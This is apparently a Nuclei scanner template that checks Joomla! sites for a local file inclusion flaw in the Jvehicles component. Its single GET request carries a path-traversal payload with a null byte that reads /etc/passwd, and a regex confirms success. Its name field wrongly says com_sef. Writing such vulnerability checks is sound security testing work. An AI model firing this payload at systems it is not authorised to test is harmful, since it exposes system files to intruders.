id: joomla-jvehicles-lfi

info:
  name: Joomla! Component com_sef - Local File Inclusion
  author: daffainfo
  severity: high
  description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/11997
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: joomla,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

# digest: 490a0046304402203ce972fdfd2c43d80af9fa095bbf1aba006e8e65ff997250dfdc3be3b69af212022055107dfe320aceca825f88e883730d69a642a8977c9c58b0ad9dad7c36eb974d:922c64590222798bb761d5b6d8e72950
